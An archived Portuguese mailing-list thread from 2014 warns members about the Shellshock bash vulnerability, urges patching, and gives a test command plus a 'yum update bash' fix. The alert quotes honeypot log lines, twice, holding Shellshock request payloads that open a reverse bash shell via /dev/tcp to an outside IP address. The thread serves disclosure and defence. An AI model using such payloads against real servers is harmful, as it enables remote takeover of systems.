Re: [AsteriskBrasil] ALERTA: Vulnerabilidade do shellshock
Segundo boletim oficial Debian (Ubuntu) e RedHat (CentOS) não tem ainda atualização certa... e o BUG parece bem perigoso goo.gl/R4rBU0 Abs Giovanni Em 26 de setembro de 2014 19:27, lyon lisboa lyonlis...@gmail.com escreveu: ops, parece que já tem atualização! Em 26 de setembro de 2014 19:17, lyon lisboa lyonlis...@gmail.com escreveu: Flavio, Você sabe quais versões estão suscetíveis a essa vulnerabilidade? ___ WORKOFFEES KHOMP: Eventos KHOMP na sua cidade. BRASÍLIA, dia 28 de agosto e RIO DE JANEIRO, dia 04 de setembro. Inscrições GRATUITAS e sorteio de BRINDES. Garanta a sua vaga e saiba mais em: www.workoffee.com.br ___ ALIGERA – Fabricante e desenvolvedor nacional de Soluções para telefonia IP . Gateway Sip, Placas de 1E1, 2E1, 4E1 e 8E1 para PCI ou PCI Express. Banco de Canais Analógicos – Appliance Asterisk Acesse www.aligera.com.br ___ DIGIVOICE: Fabricante pioneiro em Banco de Canais e Placas E1, GSM, FXO e FXS para Asterisk e Elastix. Temos Cursos de Telefonia IP e Asterisk. Construa soluções de PABX IP com produtos DigiVoice - visite www.digivoice.com.br ___ Para remover seu email desta lista, basta enviar um email em branco para asteriskbrasil-unsubscr...@listas.asteriskbrasil.org ___ WORKOFFEES KHOMP: Eventos KHOMP na sua cidade. BRASÍLIA, dia 28 de agosto e RIO DE JANEIRO, dia 04 de setembro. Inscrições GRATUITAS e sorteio de BRINDES. Garanta a sua vaga e saiba mais em: www.workoffee.com.br ___ ALIGERA Fabricante e desenvolvedor nacional de Soluções para telefonia IP . Gateway Sip, Placas de 1E1, 2E1, 4E1 e 8E1 para PCI ou PCI Express. Banco de Canais Analógicos Appliance Asterisk Acesse www.aligera.com.br ___ DIGIVOICE: Fabricante pioneiro em Banco de Canais e Placas E1, GSM, FXO e FXS para Asterisk e Elastix. Temos Cursos de Telefonia IP e Asterisk. Construa soluções de PABX IP com produtos DigiVoice - visite www.digivoice.com.br ___ Para remover seu email desta lista, basta enviar um email em branco para asteriskbrasil-unsubscr...@listas.asteriskbrasil.org
[AsteriskBrasil] ALERTA: Vulnerabilidade do shellshock
Caros amigos, A vulnerabilidade do bash conhecida como shellshock foi descoberta recentemente e divulgada ontem. Ela permite a execução de comandos remotos nos servidores através dos servidores http. Os nossos honeypots já estão detectando usuários explorando esta vulnerabilidade hoje. Não percam tempo em atualizar os servidores e evitem fraudes. Exemplo do que estamos detectando neste exato momento: [26/Sep/2014:13:13:57 +] GET / HTTP/1.0 200 414 - () { :;}; /bin/bash -c '/bin/bash -i /dev/tcp/195.225.34.14/ 01' [26/Sep/2014:13:16:54 +] GET /cgi-sys/defaultwebpage.cgi HTTP/1.0 404 507 - () { :;}; /bin/bash -c '/bin/bash -i /dev/tcp/195.225.34.14/ 01' Att, Flavio E. Goncalves ___ WORKOFFEES KHOMP: Eventos KHOMP na sua cidade. BRASÍLIA, dia 28 de agosto e RIO DE JANEIRO, dia 04 de setembro. Inscrições GRATUITAS e sorteio de BRINDES. Garanta a sua vaga e saiba mais em: www.workoffee.com.br ___ ALIGERA Fabricante e desenvolvedor nacional de Soluções para telefonia IP . Gateway Sip, Placas de 1E1, 2E1, 4E1 e 8E1 para PCI ou PCI Express. Banco de Canais Analógicos Appliance Asterisk Acesse www.aligera.com.br ___ DIGIVOICE: Fabricante pioneiro em Banco de Canais e Placas E1, GSM, FXO e FXS para Asterisk e Elastix. Temos Cursos de Telefonia IP e Asterisk. Construa soluções de PABX IP com produtos DigiVoice - visite www.digivoice.com.br ___ Para remover seu email desta lista, basta enviar um email em branco para asteriskbrasil-unsubscr...@listas.asteriskbrasil.org
Re: [AsteriskBrasil] ALERTA: Vulnerabilidade do shellshock
Flavio, Você sabe quais versões estão suscetíveis a essa vulnerabilidade? ___ WORKOFFEES KHOMP: Eventos KHOMP na sua cidade. BRASÍLIA, dia 28 de agosto e RIO DE JANEIRO, dia 04 de setembro. Inscrições GRATUITAS e sorteio de BRINDES. Garanta a sua vaga e saiba mais em: www.workoffee.com.br ___ ALIGERA Fabricante e desenvolvedor nacional de Soluções para telefonia IP . Gateway Sip, Placas de 1E1, 2E1, 4E1 e 8E1 para PCI ou PCI Express. Banco de Canais Analógicos Appliance Asterisk Acesse www.aligera.com.br ___ DIGIVOICE: Fabricante pioneiro em Banco de Canais e Placas E1, GSM, FXO e FXS para Asterisk e Elastix. Temos Cursos de Telefonia IP e Asterisk. Construa soluções de PABX IP com produtos DigiVoice - visite www.digivoice.com.br ___ Para remover seu email desta lista, basta enviar um email em branco para asteriskbrasil-unsubscr...@listas.asteriskbrasil.org
Re: [AsteriskBrasil] ALERTA: Vulnerabilidade do shellshock
ops, parece que já tem atualização! Em 26 de setembro de 2014 19:17, lyon lisboa lyonlis...@gmail.com escreveu: Flavio, Você sabe quais versões estão suscetíveis a essa vulnerabilidade? ___ WORKOFFEES KHOMP: Eventos KHOMP na sua cidade. BRASÍLIA, dia 28 de agosto e RIO DE JANEIRO, dia 04 de setembro. Inscrições GRATUITAS e sorteio de BRINDES. Garanta a sua vaga e saiba mais em: www.workoffee.com.br ___ ALIGERA Fabricante e desenvolvedor nacional de Soluções para telefonia IP . Gateway Sip, Placas de 1E1, 2E1, 4E1 e 8E1 para PCI ou PCI Express. Banco de Canais Analógicos Appliance Asterisk Acesse www.aligera.com.br ___ DIGIVOICE: Fabricante pioneiro em Banco de Canais e Placas E1, GSM, FXO e FXS para Asterisk e Elastix. Temos Cursos de Telefonia IP e Asterisk. Construa soluções de PABX IP com produtos DigiVoice - visite www.digivoice.com.br ___ Para remover seu email desta lista, basta enviar um email em branco para asteriskbrasil-unsubscr...@listas.asteriskbrasil.org
Re: [AsteriskBrasil] ALERTA: Vulnerabilidade do shellshock
Boa Noite Flavio Segue uma dica pra verificar se o servidor está vulnerável: env VAR='() { :;}; echo Bash is vulnerable!' bash -c echo Bash Test *Dica divulgada pela DigitalOcean. Pra resolver é só realizar update do bash: yum update bash [image: Sua Foto] rafaels...@gmail.comRafael S. SaraivaPorto Alegre - RS | Mobile: (51) 8174-7956 http://br.linkedin.com/pub/rafael-saraiva/52/aab/230 https://plus.google.com/u/0/+RafaelSaraivaRS Em 26 de setembro de 2014 15:11, Flavio Goncalves fla...@voffice.com.br escreveu: Caros amigos, A vulnerabilidade do bash conhecida como shellshock foi descoberta recentemente e divulgada ontem. Ela permite a execução de comandos remotos nos servidores através dos servidores http. Os nossos honeypots já estão detectando usuários explorando esta vulnerabilidade hoje. Não percam tempo em atualizar os servidores e evitem fraudes. Exemplo do que estamos detectando neste exato momento: [26/Sep/2014:13:13:57 +] GET / HTTP/1.0 200 414 - () { :;}; /bin/bash -c '/bin/bash -i /dev/tcp/195.225.34.14/ 01' [26/Sep/2014:13:16:54 +] GET /cgi-sys/defaultwebpage.cgi HTTP/1.0 404 507 - () { :;}; /bin/bash -c '/bin/bash -i /dev/tcp/ 195.225.34.14/ 01' Att, Flavio E. Goncalves ___ WORKOFFEES KHOMP: Eventos KHOMP na sua cidade. BRASÍLIA, dia 28 de agosto e RIO DE JANEIRO, dia 04 de setembro. Inscrições GRATUITAS e sorteio de BRINDES. Garanta a sua vaga e saiba mais em: www.workoffee.com.br ___ ALIGERA – Fabricante e desenvolvedor nacional de Soluções para telefonia IP . Gateway Sip, Placas de 1E1, 2E1, 4E1 e 8E1 para PCI ou PCI Express. Banco de Canais Analógicos – Appliance Asterisk Acesse www.aligera.com.br ___ DIGIVOICE: Fabricante pioneiro em Banco de Canais e Placas E1, GSM, FXO e FXS para Asterisk e Elastix. Temos Cursos de Telefonia IP e Asterisk. Construa soluções de PABX IP com produtos DigiVoice - visite www.digivoice.com.br ___ Para remover seu email desta lista, basta enviar um email em branco para asteriskbrasil-unsubscr...@listas.asteriskbrasil.org ___ WORKOFFEES KHOMP: Eventos KHOMP na sua cidade. BRASÍLIA, dia 28 de agosto e RIO DE JANEIRO, dia 04 de setembro. Inscrições GRATUITAS e sorteio de BRINDES. Garanta a sua vaga e saiba mais em: www.workoffee.com.br ___ ALIGERA Fabricante e desenvolvedor nacional de Soluções para telefonia IP . Gateway Sip, Placas de 1E1, 2E1, 4E1 e 8E1 para PCI ou PCI Express. Banco de Canais Analógicos Appliance Asterisk Acesse www.aligera.com.br ___ DIGIVOICE: Fabricante pioneiro em Banco de Canais e Placas E1, GSM, FXO e FXS para Asterisk e Elastix. Temos Cursos de Telefonia IP e Asterisk. Construa soluções de PABX IP com produtos DigiVoice - visite www.digivoice.com.br ___ Para remover seu email desta lista, basta enviar um email em branco para asteriskbrasil-unsubscr...@listas.asteriskbrasil.org